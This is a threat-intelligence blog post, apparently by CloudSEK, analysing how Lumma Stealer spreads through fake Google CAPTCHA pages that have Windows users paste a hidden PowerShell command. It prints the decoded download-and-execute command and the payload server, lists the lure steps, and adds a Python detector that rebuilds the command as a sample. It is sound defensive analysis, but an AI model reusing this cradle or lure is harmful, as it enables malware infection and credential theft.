Revealing the Threat: Lumma Stealer Malware Takes Advantage of Fake CAPTCHA Pages | CloudSEK

Short Summary:

A new method of distributing Lumma Stealer malware has been identified, targeting Windows users through deceptive human verification pages. This technique, discovered by Unit42 at Palo Alto Networks, utilizes fake Google CAPTCHA pages to execute PowerShell commands that download the malware.

Key Points:

  • Target: Windows users via deceptive human verification pages.
  • Technique involves fake Google CAPTCHA prompts.
  • PowerShell commands are executed to download Lumma Stealer from remote servers.
  • Malicious sites hosted on various platforms, including CDNs and Amazon S3.
  • Attackers use clipboard manipulation and base64 encoding to evade detection.
  • Recommendations include user education and robust endpoint protection.

MITRE ATT&CK TTPs – created by AI

  • Command and Scripting Interpreter (T1059)
    • Procedure: PowerShell commands executed to download Lumma Stealer.
  • Phishing (T1566)
    • Procedure: Fake Google CAPTCHA pages used to lure users into executing malicious commands.
  • Remote File Copy (T1105)
    • Procedure: Downloading Lumma Stealer from remote servers using PowerShell.
  • Clipboard Data Manipulation (T1115)
    • Procedure: Copying malicious PowerShell commands to the clipboard via user interaction.

Category: Adversary Intelligence

Industry: Multiple

Motivation: Cyber Crime/Financial

Region: Global

TLP: GREEN

Executive Summary

A new and sophisticated method of distributing Lumma Stealer malware has been uncovered, targeting Windows users through deceptive human verification pages. This technique, initially discovered by Unit42 at Palo Alto Networks, has prompted further investigation into similar malicious sites.

In the course of our investigation, we identified further active malicious sites spreading Lumma Stealer. It is important to note that while this technique is currently being used to distribute Lumma Stealer, it could be leveraged to deliver any type of malware to unsuspecting users.

Flow of the Phishing Campaign and Malware Infection

Analysis and Attribution

Modus Operandi

Threat actors create phishing sites hosted on various providers, often utilizing Content Delivery Networks (CDNs). These sites present users with a fake Google CAPTCHA page.

  • Upon clicking the “Verify” button, users are presented with unusual instructions:
    • Open the Run dialog (Win+R)
    • Press Ctrl+V
    • Hit Enter
  • Unbeknownst to the user, this action executes a hidden JavaScript function that copies a base64-encoded PowerShell command to the clipboard.
  • The PowerShell command, when executed, downloads the Lumma Stealer malware from a remote server.

Technical Analysis

Our research team identified multiple domains hosting these malicious verification pages. The infection chain typically follows this pattern:

  • The user visits the fake verification page.
Figure: Phishing page presenting a deceptive Google CAPTCHA verification prompt

  • The PowerShell script is copied to the clipboard when the user clicks the “I’m not a robot” button. Inspecting the source code of the phishing sites also reveals the command being copied.
Figure: Verification steps requested by the deceptive sites

  • Once the user pastes the PowerShell command into the Run dialog box, it runs PowerShell in a hidden window and executes the Base64-encoded command: powershell -w hidden -eC
  • The decoded Base64 command, iex (iwr http://165.227.121.41/a.txt -UseBasicParsing).Content, fetches the content of the a.txt file hosted on the remote server. That content is then parsed and executed via Invoke-Expression.
  • The a.txt file contains additional commands that download the Lumma Stealer onto the victim’s device, hosted at: https://downcheck.nyc3[.]cdn[.]digitaloceanspaces.com/dengo.zip

Figure: Further commands in a.txt to download the malicious file

  • If the downloaded file (dengo.zip) is extracted and executed on a Windows machine, the Lumma Stealer becomes operational and establishes connections with attacker-controlled domains.
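To show how a defender can surface the hidden-window step above in process-creation telemetry, here is an added Python example (not code from the CloudSEK report) that decodes a PowerShell -EncodedCommand argument (base64 of the UTF-16LE script text) and flags the iex/iwr download cradle. The sample command lines are constructed; the first reproduces the decoded command quoted on this page, the others are benign controls.

```python
import base64
import re

def encode_cmd(cmd: str) -> str:
    """PowerShell's -EncodedCommand expects base64 of the UTF-16LE script text."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

# Constructed process-creation command lines (assumed telemetry, not from the report).
SAMPLE_EVENTS = [
    "powershell -w hidden -eC " + encode_cmd("iex (iwr http://165.227.121.41/a.txt -UseBasicParsing).Content"),
    "powershell.exe -EncodedCommand " + encode_cmd("Get-Date"),
    "notepad.exe C:\\Users\\victim\\notes.txt",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
# Download cradle: Invoke-Expression over content fetched with Invoke-WebRequest/DownloadString.
CRADLE = re.compile(r"\b(?:iex|invoke-expression)\b.*\b(?:iwr|invoke-webrequest|downloadstring)\b", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\")]+")

def decode_encoded_command(cmdline: str):
    """Return the decoded script behind -EncodedCommand, or None if absent/undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse(cmdline: str) -> dict:
    decoded = decode_encoded_command(cmdline)
    return {
        "decoded": decoded,
        "hidden": bool(HIDDEN.search(cmdline)),
        "cradle": bool(decoded and CRADLE.search(decoded)),
        "urls": URL.findall(decoded) if decoded else [],  # remote stage to block/hunt
    }

def verdict(cmdline: str) -> str:
    """Triage label: encoded + remote-fetch-and-execute is the pattern seen in this campaign."""
    r = analyse(cmdline)
    if r["cradle"]:
        return "high"
    if r["decoded"] is not None:
        return "medium" if r["hidden"] else "low"
    return "none"

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(verdict(ev), analyse(ev)["urls"], ev[:60])
```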

Notable Observations

  • Malicious pages were found on various platforms, including Amazon S3 buckets and CDN providers.
  • The use of base64 encoding and clipboard manipulation demonstrates the attackers’ efforts to evade detection.
  • The initial executable often downloads additional components, complicating analysis and potentially allowing for modular functionality.
  • Although this campaign primarily targets distributing Lumma Stealer malware, it has the potential to deceive users into downloading various types of malicious files onto their Windows devices.

Recommendations

  • Educate Employees/Users about this new social engineering tactic, emphasizing the danger of copying and pasting unknown commands.
  • Implement and maintain robust endpoint protection solutions capable of detecting and blocking PowerShell-based attacks.
  • Monitor network traffic for suspicious connections to newly registered or uncommon domains.
  • Regularly update and patch all systems to mitigate potential vulnerabilities exploited by the Lumma Stealer malware.

Malicious Fake URLs


Type | Name | Value
File | dengo.zip | 7c348f51d383d6587e2beac5ff79bef2e66c31d7
IP | Downloader Server IP | 165.227.121.41
PE Exec File | tr7 | e002696bb7d57315b352844cebc031e18e89f29e
PE Exec File | 2ndhsoru | 766c266506918b467bf35db701c9b0954a616b58

Appendix

Figure: Lumma Stealer Malware-as-a-Service page
CloudSEK TRIAD

CloudSEK Threat Research and Information Analytics Division

Source: https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages